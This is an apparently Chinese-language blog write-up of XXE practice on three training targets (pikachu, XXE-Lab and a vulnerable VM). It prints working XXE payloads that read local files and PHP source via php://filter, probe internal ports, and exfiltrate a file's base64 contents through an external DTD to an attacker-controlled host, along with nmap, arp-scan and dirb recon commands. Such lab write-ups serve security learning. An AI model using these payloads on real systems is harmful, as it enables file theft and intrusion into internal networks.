XXE练习

Autumn.h2024-12-19 9:24

pikachu-XXE靶场

1.POC:攻击测试

复制代码 
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe "a">]>
<foo>&xxe;</foo>

2.EXP:查看文件

复制代码 
<?xml version="1.0"?>
<!DOCTYPE foo [ 
<!ENTITY xxe SYSTEM "file:///C:/flag/flag" > ]>
<foo>&xxe;</foo>

3.EXP:查看源码

复制代码 
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=D:/phpstudy/phpstudy_pro/WWW/1.php">]>
<foo>&xxe;</foo>

4.EXP:DTD外部调用

复制代码 
<!ENTITY evil SYSTEM "file:///C:/flag/flag">

<!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://172.16.1.195:80/evil.dtd">
%xxe;
]>
<foo>&evil;</foo>

5.EXP:探测内网存活主机与开放端口

复制代码 
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE foo [
<!ELEMENT foo ANY> 
<!ENTITY rabbit SYSTEM "http://127.0.0.1:80">
]>
<x>&rabbit</x>

端口开放回显很快

端口未开连接超时

复制代码 
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE foo [
<!ELEMENT foo ANY> 
<!ENTITY rabbit SYSTEM "http://127.0.0.1:8087">
]>
<x>&rabbit</x>

6.EXP:无回显探测

复制代码 
<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://192.168.133.129:8888/?%file;'>">
%start;

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE message [ <!ENTITY % remote SYSTEM "http://172.16.1.195/66.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/flag/flag">
%remote;
%send;
]>

XXE-Lab靶场

目标获取flag

1.访问网页

2.尝试注入,获取flag

BP抓他瞧一瞧

看到支持接收xml数据注入一下试试

text/xml和application/xml

复制代码 
<!DOCTYPE username [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=C:/flag/flag">]>
<user>
  <username>
&xxe;
  </username>
  <password>1</password>
</user>

//flag{dmsioamdoiasdmdmwmdsmd}

XXE靶机

目标获取flag

1.装好靶机

这个样子就可以了

2.获取靶机IP

用Nmap扫描整个D段获取靶机IP

复制代码 
nmap -O 192.168.133.129/24

或者是用命令

复制代码 
arp-scan -l

4.信息收集

先去看看网页

Apache的默认页面,并什么可以利用的

利用dirb工具去扫一下后台目录和文件

复制代码 
dirb http://192.168.133.131/

挨个访问一遍后发现两个登录界面

5.尝试注入

xxe有回显点

抓包看看;尝试注入

查看admin.php的源码

复制代码 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/admin.php">]>
<root>
		<name>
				&xxe;
		</name>
		<password>
				1
  </password>
</root>

解密后,在看源码发现好像是账号密码;去解密一下登录试试

登录后是这样,点击Flag后发现新的php文件

去访问看看

复制代码 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/xxe/flagmeout.php">]>
<root>
		<name>
				&xxe;
		</name>
		<password>
				1
		</password>
</root>

解密后

Base32解密后发现还得64解码

得到一个php文件去访问试试

复制代码 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///etc/.flag.php">]>
<root>
		<name>
				&xxe;
		</name>
		<password>
				1
		</password>
</root>

6.成功获取flag

在php文件中运行

访问一下就成功获取flag

复制代码 
 SAFCSP{xxe_is_so_easy}
相关推荐
Bruce_Liuxiaowei21 分钟前
PHP文件包含漏洞详解:原理、利用与防御
开发语言·网络安全·php·文件包含
2501_915106321 小时前
Flutter、React Native 项目如何搞定 iOS 上架?从构建 IPA 到上传 App Store 的实战流程全解析
websocket·网络协议·tcp/ip·http·网络安全·https·udp
网安INF2 小时前
CVE-2023-25194源码分析与漏洞复现(Kafka JNDI注入)
java·web安全·网络安全·kafka·漏洞·jndi注入
恰薯条的屑海鸥3 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十期-Over Permission 模块)
学习·安全·web安全·渗透测试·网络安全学习
Bruce_Liuxiaowei4 小时前
深入理解PHP安全漏洞:文件包含与SSRF攻击全解析
开发语言·网络安全·php
痴人说梦梦中人10 小时前
自建 dnslog 回显平台:渗透测试场景下的隐蔽回显利器
web安全·网络安全·渗透测试·php·工具
Web极客码12 小时前
如何轻松、安全地管理密码(新手指南)
计算机网络·安全·web安全·网络安全
安全系统学习13 小时前
【网络安全】Qt免杀样本分析
java·网络·安全·web安全·系统安全
枷锁—sha15 小时前
护网行动面试试题(2)
web安全·面试·职场和发展
hanniuniu1315 小时前
网络安全厂商F5推出AI Gateway,化解大模型应用风险
人工智能·web安全·gateway
热门推荐
01Coze扣子平台完整体验和实践(附国内和国际版对比)02KGG转MP3工具|非KGM文件|解密音频03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04【无人机】无人机通信模块,无人机图数传模块的介绍,数传,图传,图传数传一体电台,05从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑06【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!07海康Visionmaster-常见问题排查方法-启动阶段08DeepSeek各版本说明与优缺点分析09VMware虚拟机安装Win7专业版保姆级教程(附镜像包)10神经网络架构KAN确实具有一些独特的特点及底层原理和应用场景